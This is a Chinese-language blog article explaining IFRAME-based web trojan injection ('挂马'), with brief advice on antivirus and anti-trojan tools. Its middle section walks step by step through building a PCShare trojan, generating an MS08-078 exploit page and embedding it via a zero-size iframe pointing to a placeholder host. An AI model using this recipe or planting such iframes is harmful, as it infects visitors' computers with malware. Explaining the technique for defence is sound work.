近段时间，朋友一个做推广的房产网站成为天天被木马光顾的一个目标，基本每天一上QQ，就是朋友的紧急呼救，又被挂上了，我又在重复每天那套单调的木马清理动作，我FANT~~~~

    我们来看一下，实施网页挂马者的目的，一般网页挂马，是为了大规模盗号。那针对我朋友的这类做推广的房产网站挂马，则除了盗号的作用之外，还兼有捣乱、破坏的目的。大家都知道，国庆前后，对于海景房产的销售，做网络推广，基本是这一年当中的最后一次搏击了，希望能通过网络推广取得一个比较好的年终房产销售收尾，但是恰恰为此，有部分心术不正的房产销售者，通过网络中一些卑劣手段破坏压制同行网站，挂马就成了最常用的手法。

    那我们如何避免呢？就让我们来看一下，最常见的网页IFRAME框架挂马到底是怎么进行的。

    理解IFRAME框架挂马

　　网页挂马通过部分所谓“黑客”的努力已经衍生出许多方法与应用手段，其中IFRAME网页框架挂马是最典型的挂马方式，也是最基本的挂马方式，可以这样说，没有IFRAME，网页木马就有多半无法隐藏，让用户在不察觉中受到攻击。

　　那什么是IFRAME？IFRAME是一个普通HTML语言标记，主要用来在一个网页界面中，划分出左右或者高低的框架，类似于我们在电视机中看到的画中画效果，能比较方便的让网络工作人员使用简练的程序语言引用其他网页的内容。

　　但是IFRAME功能却被黑客们用作它途，他们在一些看似正常的网页中，使用长宽为0的隐藏框架，让用户在不知不觉中打开含有漏洞溢出形式的网页木马，这种手法就像是在画中画电视中打开了一个收费频道，但是由于收费频道的画面尺寸被恶意修改成了0，所以看电视的人并不知道自己已经打开了收费频道，虽然他并没有看到，但是事实上收费频道却在播放，而且会收取用户的使用费。

　　IFRAME框架挂马手法

　　理解了IFRAME挂马，我在举例谈谈IFRAME框架挂马到底是怎么做的。

　　首先，预备一款得心应手的木马，例如PCShare，这款软件在设置上非常简单，易于操作上手。设置好相关服务，最后生成木马所用的服务控制端。

　　其次，使用FTP将木马上传到自己的网络空间，用记事本记录下木马的网络路径。然后用《MS08-078网页木马生成器》，生成一个带有MS08-078漏洞的歹意网页。找一个正常的祝福或是贺卡网页，将该网页保存到指定的目录，然后使用Dreamweaver或Web Designer网页编辑器对保存的网页进行调整修改，然后上传到自己的网络空间，看图片等形式是否能够正常显示。

　　第三，再一次打开修改好的那个正常网页，使用IFRAME标记语句，将生成的MS08-078网页嵌入到正常网页中，嵌入挂马代码如下：
<iframe src=http://www.XXXXXX.com/ms08078.html width=0 height=0></iframe>

　　将这段代码插入到正常网页之中后，就完成了网页挂马操作。阅读贺卡网页的用户，在打开贺卡页面之后，也随之运行了保存在指定位置“http://www.XXXXXX.com/ms08078.html”的漏洞溢出页面，但是由于它的长和宽都为“0”，观看贺卡网站的用户不会看到溢出页面。

　　好了，我们了解了有关IFRAME挂马的方法，我们如何防范网页被挂马呢？这是周边部分朋友经常问我的一句话，很遗憾，由于ASP程序自身的缺陷，其网页很容易被人入侵，并且对于IFRAME标记这种应用正常HTML语言功能实现隐藏的挂马方式，目前也没有好的控制防范措施，因为它属于正常的网页功能，无法进行屏蔽，否则网页功能中引用的内容，如百度搜索框、天气预报等内容会全部失效。所以现在也只能寄希望于杀毒软件和防挂马软件阻止应用IFRAME标记内嵌的溢出病毒网页。

    在此我建议大家在安装杀毒软件之后，也同时需要安装第三方防挂马软件作为补充，例如360、锐甲等。